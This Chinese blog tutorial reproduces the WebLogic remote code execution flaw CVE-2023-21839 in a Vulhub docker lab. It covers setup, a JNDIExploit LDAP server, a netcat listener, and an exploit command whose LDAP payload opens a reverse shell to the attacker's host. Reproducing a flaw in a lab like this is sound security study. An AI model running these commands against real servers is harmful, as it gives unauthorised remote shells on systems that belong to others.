侧边栏壁纸
博主头像
cz

人生可以拼可以闯,但不能忘本!

  • 累计撰写 39 篇文章
  • 累计创建 17 个标签
  • 累计收到 79 条评论

目 录CONTENT

文章目录

Weblogic产品中的远程代码执行漏洞(cve-2023-21839)保姆级教程

cz
cz
2023-04-18 / 2 评论 / 6 点赞 / 269 阅读 / 904 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2023-05-14,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

一 、漏洞简介

1、背景概述

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。

1月18日,Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),该漏洞的CVSSv3评分为7.5,可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

2、漏洞告警等级

高危

3、影响范围

Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

4、解决方案

安装Oracle WebLogic Server最新安全补丁
关闭T3和iiop协议端口

5、相关工具已打包,地址放在文末

二、复现环境

为了简单粗暴,我这边只用两台机器
靶机(搭建的Vulhub漏洞测试靶场),监听机(反弹shell):这里我统一选择使用kali:192.168.199.129
攻击机(本地主机):使用CVE-2023-21839工具发起exp攻击

三、环境搭建

1、使用docker,docker-compose搭建Vulhub

cve-2023-21839docker-compose下载
将部署配置文件拖进kali桌面,进去文件夹,单击右键,在终端打开
image-1681801872969

sudo docker-compose up -d 

image-1681801979085
由于我这边已经部署过了,就不给大家具体展示安装过程了
因为我这边是普通用户模式,不想加sudo的可以su - root 输入root密码,然后cd到相应的目录下即可。

查看我们创建的漏洞环境是否正常启动

docker ps

如图所示,环境已部署成功
image-1681802197268

2、验证漏洞环境

打开浏览器输入kali的ip地址加端口号
192.168.199.129:7001
如图所示显示安装成功
image-1681802320850
输入地址访问测试页面

http://192.168.199.129:7001/console/login/LoginForm.jsp

image-1681802392019

3、漏洞复现

漏洞利用工具下载地址
JNDIExploit
Weblogic CVE-2023-21839 RCE
使用前先检查自己java版本

java -version

image-1681802975174
(1)使用工具JNDIExploit-1.4-SNAPSHOT.jar在kali上设置监听:
先进入JNDIExploit目录
image-1681803060101

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.199.129

image-1681803230792
(2)在kail配置监听端口
ctrl+shift+T开启一个新的窗口

nc -lvvp xxxx
##这里端口任意,对应的下面攻击的端口号

image-1681803381202
(3)使用CVE-2023-21839工具来进行攻击测试(由于我是本机进行攻击测试,首先将工具用go进行编译,在执行相关操作)
注:此操作在本地和kali上进行都可以,由于我本地有go语言环境就不在kali上给大家进行演示了,本地go语言环境大家自行参考相关教程进行安装配置,加入环境变量
安装好go环境,测试一下

go version

image-1681803856243
用go编译工具

go build -o main.go

执行攻击测试

./main.exe -ip 192.168.199.128 -port 7001 -ldap ldap://192.168.199.129:1389/Basic/ReverseShell/192.168.199.129/7788

image-1681804632013
现在我们去kali看一下监听情况,这里我们可以看到,攻击成功
image-1681804703927
监听成功,成功反弹shell
image-1681804829917
至此关于cve-2023-21839的漏洞复现全部结束!

6

评论区